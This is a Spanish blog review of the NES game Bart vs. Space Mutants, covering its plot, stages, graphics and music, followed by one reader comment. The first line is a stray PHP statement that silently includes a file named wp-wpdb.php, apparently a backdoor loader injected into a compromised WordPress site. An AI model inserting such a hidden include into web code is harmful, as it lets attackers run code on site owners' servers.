if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Bart vs. Space Mutants para NES – La Fortaleza de LeChuck

Bart vs. Space Mutants para NES

Bart vs. Space Mutants es, bajo mi punto de vista, uno de los mejores juegos que han pasado por la NES. Esta consola cuenta con un catálogo bastante extenso y con mucha variedad, y a pesar de todo eso un clásico como son los Simpsons triunfaron en las plataformas 2D, allí por el año 1992. El juego fue desarrollado por la compañía Acclaim y pensado para dos jugadores por turnos, es decir, había que esperar que tu compañero muriera para poder jugar.

Aunque pueda parecer raro, creo que este juego, y con el permiso de Bart vs. World, es sin duda uno de los mejores o el mejor videojuego que se ha hecho sobre la archiconocida familia Simpsons. Sin duda alguna es uno de los más divertidos que he probado y que aunque no trate de forma muy cuidadosa a los personajes si que trata de una mejor forma los espacios y lugares de la serie.
La historia de este videojuego ronda en torno a que la tierra es invadida una vez más por una horda extraterrestre. Nuestra familia preferida estaba viendo la tele en su sofá cuando de repente aparece un platillo volante. Dentro de este hay mucho mutante espaciales que vienen a la tierra construir una “super arma” y de paso intentar conquistar la Tierra. Como no podía ser de otra forma, la conquista del mundo comienza con el ataque a Springfield.
Según parece, los mutantes son invisibles para el ojo humano, pero el niño malo de américa, Bart, tiene unas gafas especiales equipadas con rayos x con las que puede ver a los mutantes.
Los escenarios donde podremos salvar al mundo de la amenaza alienígena son Springfield, El centro Comercial, El Parque de Atracciones, El Museo de Springfield, La Central Nuclear y el Bar de Moe
Algo que no podía faltar en un juego de los Simpsons son las bromas que realiza Bart a Moe. Este aspecto está bastante cuidado en el juego ya que si nos acercamos a alguna de las cabinas que aparecen en el juego podremos telefonear a Moe y gastarle alguna de las clásicas bromas de Bart.
Si hablamos del apartado gráfico debemos decir que es un juego colorido y detallado que recuerda bastante a la serie de televisión.
El apartado musical llega a ser repetitivo y sobretodo después de un rato jugando. Los efectos como el del Spray o las bombas son muy buenos y hacen que la jugabilidad gane puntos. Os dejo un video para que veáis y escuchéis el juego de primera mano:
Ahora os toca a ustedes, ¿Cuál es vuestro juego favorito de los Simpsons?, ¿A cuáles habéis jugado?
Publicada el
Categorizado como Retro

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

8 comentarios

  1. Mi juego favorito de los Simpsons, sin duda, este, buenísimo, no sabes cuantos recuerdos me trae de la infancia, me lo vicié muchísimo.

    También es cierto que solo he jugado a este y al Hit & Run, que por cierto, me pareció entretenido, pero este, y más para la época en que fue lanzado, me parece que está muy currado, sobretodo a nivel de pequeños detalles.

    Que sorpresa

Dejar un comentario